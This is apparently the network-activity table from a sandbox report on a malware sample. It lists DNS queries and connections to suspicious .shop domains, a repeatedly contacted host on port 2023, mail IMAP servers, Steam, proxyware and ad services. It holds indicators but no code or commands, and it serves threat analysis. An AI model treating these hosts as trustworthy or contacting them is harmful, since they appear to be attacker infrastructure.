| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.244.186:443 | dl-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | stalfbaclcalorieeis.shop | udp |
| US | 104.21.3.197:443 | stalfbaclcalorieeis.shop | tcp |
| US | 8.8.8.8:53 | 3.71.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.244.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.3.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | civilianurinedtsraov.shop | udp |
| US | 104.21.49.245:443 | civilianurinedtsraov.shop | tcp |
| US | 8.8.8.8:53 | roomabolishsnifftwk.shop | udp |
| US | 104.21.55.87:443 | roomabolishsnifftwk.shop | tcp |
| US | 8.8.8.8:53 | api5.tracemonitors.com | udp |
| US | 8.8.8.8:53 | api5.tracemonitors.com | udp |
| US | 44.235.180.78:443 | api5.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | clients41.google.com | udp |
| US | 8.8.8.8:53 | 245.49.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.55.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.180.235.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 92.92.68.104.in-addr.arpa | udp |
| US | 172.67.142.104:443 | tubewelfaredopw.shop | tcp |
| US | 172.67.184.107:443 | museumtespaceorsp.shop | tcp |
| DE | 212.227.17.162:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.21.45.202:443 | buttockdecarderwiso.shop | tcp |
| US | 8.8.8.8:53 | monitor.repocket.com | udp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| US | 172.67.220.163:443 | averageaattractiionsl.shop | tcp |
| US | 104.21.71.3:443 | femininiespywageg.shop | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 172.67.203.218:443 | employhabragaomlsp.shop | tcp |
| US | 104.21.3.197:443 | stalfbaclcalorieeis.shop | tcp |
| US | 104.21.49.245:443 | civilianurinedtsraov.shop | tcp |
| US | 104.21.55.87:443 | roomabolishsnifftwk.shop | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| GB | 216.58.212.206:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | api.ozon.ru | udp |
| US | 162.159.140.24:443 | api.ozon.ru | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 24.140.159.162.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| NL | 157.240.201.63:443 | i.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 63.201.240.157.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | imap.gmx.net | udp |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 170.17.227.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.162:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | mailserver.pappone.it | udp |
| US | 103.224.182.246:143 | mailserver.pappone.it | tcp |
| DE | 212.227.17.162:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | login.edge.app | udp |
| US | 165.232.155.117:443 | login.edge.app | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 117.155.232.165.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.repaxkapp.click | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| BE | 104.68.92.92:443 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | myaccount.ingrammicro.com | udp |
| BE | 104.68.85.93:443 | myaccount.ingrammicro.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 93.85.68.104.in-addr.arpa | udp |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| US | 162.159.140.24:443 | api.ozon.ru | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | search-cdn.net | udp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| US | 8.8.8.8:53 | maxask.com | udp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| US | 172.67.213.47:443 | maxask.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 172.67.213.47:443 | maxask.com | udp |
| FR | 216.137.52.98:443 | platform-api.sharethis.com | tcp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 172.217.169.46:443 | cse.google.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| FR | 18.161.97.53:443 | buttons-config.sharethis.com | tcp |
| IE | 52.51.183.125:443 | l.sharethis.com | tcp |
| GB | 142.250.187.238:443 | www.adsensecustomsearchads.com | tcp |
| GB | 172.217.169.46:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| GB | 142.250.178.2:443 | partner.googleadservices.com | tcp |
| US | 8.8.8.8:53 | datasphere-sbsvc.sharethis.com | udp |
| FR | 3.160.188.13:443 | datasphere-sbsvc.sharethis.com | tcp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 172.116.248.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.52.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.183.51.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.188.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | platform-cdn.sharethis.com | udp |
| FR | 216.137.52.19:443 | platform-cdn.sharethis.com | tcp |
| FR | 216.137.52.19:443 | platform-cdn.sharethis.com | tcp |
| FR | 216.137.52.19:443 | platform-cdn.sharethis.com | tcp |
| FR | 216.137.52.19:443 | platform-cdn.sharethis.com | tcp |
| FR | 216.137.52.19:443 | platform-cdn.sharethis.com | tcp |
| FR | 216.137.52.19:443 | platform-cdn.sharethis.com | tcp |
| FR | 52.84.45.68:443 | count-server.sharethis.com | tcp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 19.52.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.45.84.52.in-addr.arpa | udp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 31.214.157.31:80 | 31.214.157.31 | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 31.157.214.31.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 21.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 162.159.140.24:443 | api.ozon.ru | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | viraltool.tk | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | viraltool.tk | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| RU | 87.240.190.70:443 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 70.190.240.87.in-addr.arpa | udp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| US | 162.159.140.24:443 | api.ozon.ru | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.162:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 172.217.169.46:443 | cse.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | flowgpt.com | udp |
| US | 104.22.24.192:443 | flowgpt.com | tcp |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 192.24.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod-backend-k8s.flowgpt.com | udp |
| US | 104.22.24.192:443 | prod-backend-k8s.flowgpt.com | udp |
| US | 172.67.7.41:443 | prod-backend-k8s.flowgpt.com | tcp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | flow-user-images.s3.us-west-1.amazonaws.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| US | 3.5.163.14:443 | flow-user-images.s3.us-west-1.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 41.7.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.163.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1816e4d6cd83.us-east-2.sdk.awswaf.com | udp |
| US | 8.8.8.8:53 | 1816e4d6cd83.us-east-2.captcha-sdk.awswaf.com | udp |
| FR | 18.161.97.26:443 | 1816e4d6cd83.us-east-2.captcha-sdk.awswaf.com | tcp |
| FR | 54.230.112.46:443 | 1816e4d6cd83.us-east-2.sdk.awswaf.com | tcp |
| US | 8.8.8.8:53 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| US | 8.8.8.8:53 | api.ozon.ru | udp |
| FR | 18.161.97.65:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | tcp |
| US | 162.159.140.24:443 | api.ozon.ru | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.187.206:443 | analytics.google.com | tcp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | 46.112.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 8.8.8.8:53 | 119.190.114.20.in-addr.arpa | udp |
| FR | 18.161.97.65:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| US | 8.8.8.8:53 | 1816e4d6cd83.ba5a2ce6.us-east-2.captcha.awswaf.com | udp |
| FR | 216.137.52.96:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.captcha.awswaf.com | tcp |
| US | 8.8.8.8:53 | 96.52.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o4505662743511040.ingest.us.sentry.io | udp |
| US | 34.120.195.249:443 | o4505662743511040.ingest.us.sentry.io | tcp |
| US | 8.8.8.8:53 | cdn.growthbook.io | udp |
| US | 151.101.1.91:443 | cdn.growthbook.io | tcp |
| US | 8.8.8.8:53 | data-ingestion.flowgpt.com | udp |
| US | 18.224.235.4:443 | data-ingestion.flowgpt.com | tcp |
| US | 18.224.235.4:443 | data-ingestion.flowgpt.com | tcp |
| US | 18.224.235.4:443 | data-ingestion.flowgpt.com | tcp |
| US | 18.224.235.4:443 | data-ingestion.flowgpt.com | tcp |
| US | 18.224.235.4:443 | data-ingestion.flowgpt.com | tcp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | flow-public-assets.s3.amazonaws.com | udp |
| US | 52.219.216.81:443 | flow-public-assets.s3.amazonaws.com | tcp |
| US | 52.219.216.81:443 | flow-public-assets.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| US | 8.8.8.8:53 | vitals.vercel-insights.com | udp |
| IE | 68.219.88.97:443 | c.clarity.ms | tcp |
| IE | 18.203.30.8:443 | vitals.vercel-insights.com | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 204.79.197.237:443 | c.bing.com | tcp |
| US | 172.67.165.228:443 | widget.changelogfy.com | tcp |
| GB | 142.250.187.206:443 | analytics.google.com | udp |
| US | 172.67.7.41:443 | prod-backend-k8s.flowgpt.com | tcp |
| US | 3.5.163.14:443 | flow-user-images.s3.us-west-1.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 97.88.219.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.216.219.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.30.203.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.165.67.172.in-addr.arpa | udp |
| US | 52.219.216.81:443 | flow-public-assets.s3.amazonaws.com | tcp |
| US | 172.67.165.228:443 | widget.changelogfy.com | udp |
| US | 8.8.8.8:53 | app.changelogfy.com | udp |
| US | 172.67.165.228:443 | app.changelogfy.com | tcp |
| US | 172.67.7.41:443 | prod-backend-k8s.flowgpt.com | udp |
| US | 52.219.216.81:443 | flow-public-assets.s3.amazonaws.com | tcp |
| US | 52.219.216.81:443 | flow-public-assets.s3.amazonaws.com | tcp |
| US | 172.67.165.228:443 | app.changelogfy.com | udp |
| US | 8.8.8.8:53 | cdn.changelogfy.com | udp |
| US | 8.8.8.8:53 | ui-avatars.com | udp |
| US | 104.21.49.187:443 | cdn.changelogfy.com | tcp |
| US | 104.26.8.185:443 | ui-avatars.com | tcp |
| US | 104.21.49.187:443 | cdn.changelogfy.com | udp |
| US | 8.8.8.8:53 | 185.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.49.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image-cdn.flowgpt.com | udp |
| FR | 3.160.188.68:443 | image-cdn.flowgpt.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | ci3.googleusercontent.com | udp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 172.217.169.1:443 | ci3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | git.enderman.ch | udp |
| US | 104.21.28.75:443 | git.enderman.ch | tcp |
| GB | 172.217.169.1:443 | ci3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 1.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.188.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.28.21.104.in-addr.arpa | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 104.21.28.75:443 | git.enderman.ch | udp |
| US | 8.8.8.8:53 | s3.us-east-1.amazonaws.com | udp |
| US | 54.231.192.208:443 | s3.us-east-1.amazonaws.com | tcp |
| US | 54.231.192.208:443 | s3.us-east-1.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 208.192.231.54.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 3.160.188.68:443 | image-cdn.flowgpt.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | mgen.fast-dl.cc | udp |
| US | 104.21.6.40:443 | mgen.fast-dl.cc | tcp |
| US | 104.21.6.40:443 | mgen.fast-dl.cc | tcp |
| US | 8.8.8.8:53 | go.enderman.ch | udp |
| US | 8.8.8.8:53 | 40.6.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | services.vlitag.com | udp |
| US | 172.67.21.227:443 | services.vlitag.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.21.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 172.67.21.227:443 | services.vlitag.com | udp |
| US | 8.8.8.8:53 | dsp.vlitag.com | udp |
| US | 8.8.8.8:53 | cmp.inmobi.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | s3.vlitag.com | udp |
| FR | 3.160.179.199:443 | c.amazon-adsystem.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| FR | 54.230.112.56:443 | cmp.inmobi.com | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| FR | 3.160.179.199:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.179.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.112.230.54.in-addr.arpa | udp |
| FR | 18.161.97.109:443 | config.aps.amazon-adsystem.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | px.vliplatform.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| FR | 54.230.112.56:443 | cmp.inmobi.com | tcp |
| FR | 52.85.3.232:443 | aax.amazon-adsystem.com | tcp |
| FR | 52.85.3.232:443 | aax.amazon-adsystem.com | tcp |
| FR | 52.85.3.232:443 | aax.amazon-adsystem.com | tcp |
| FR | 52.85.3.232:443 | aax.amazon-adsystem.com | tcp |
| FR | 52.85.3.232:443 | aax.amazon-adsystem.com | tcp |
| FR | 52.85.3.232:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | api.cmp.inmobi.com | udp |
| DE | 52.29.87.71:443 | api.cmp.inmobi.com | tcp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 8.8.8.8:53 | prebid-eu.creativecdn.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | useast.quantumdex.io | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| DE | 141.101.120.10:443 | px.vliplatform.com | udp |
| NL | 185.89.210.20:443 | ib.adnxs.com | tcp |
| NL | 185.89.210.20:443 | ib.adnxs.com | tcp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 172.67.42.201:443 | useast.quantumdex.io | tcp |
| US | 172.67.42.201:443 | useast.quantumdex.io | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 104.18.23.145:443 | cadmus.script.ac | tcp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| IE | 34.251.66.169:443 | ap.lijit.com | tcp |
| IE | 34.251.66.169:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | 10.120.101.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.3.85.52.in-addr.arpa | udp |
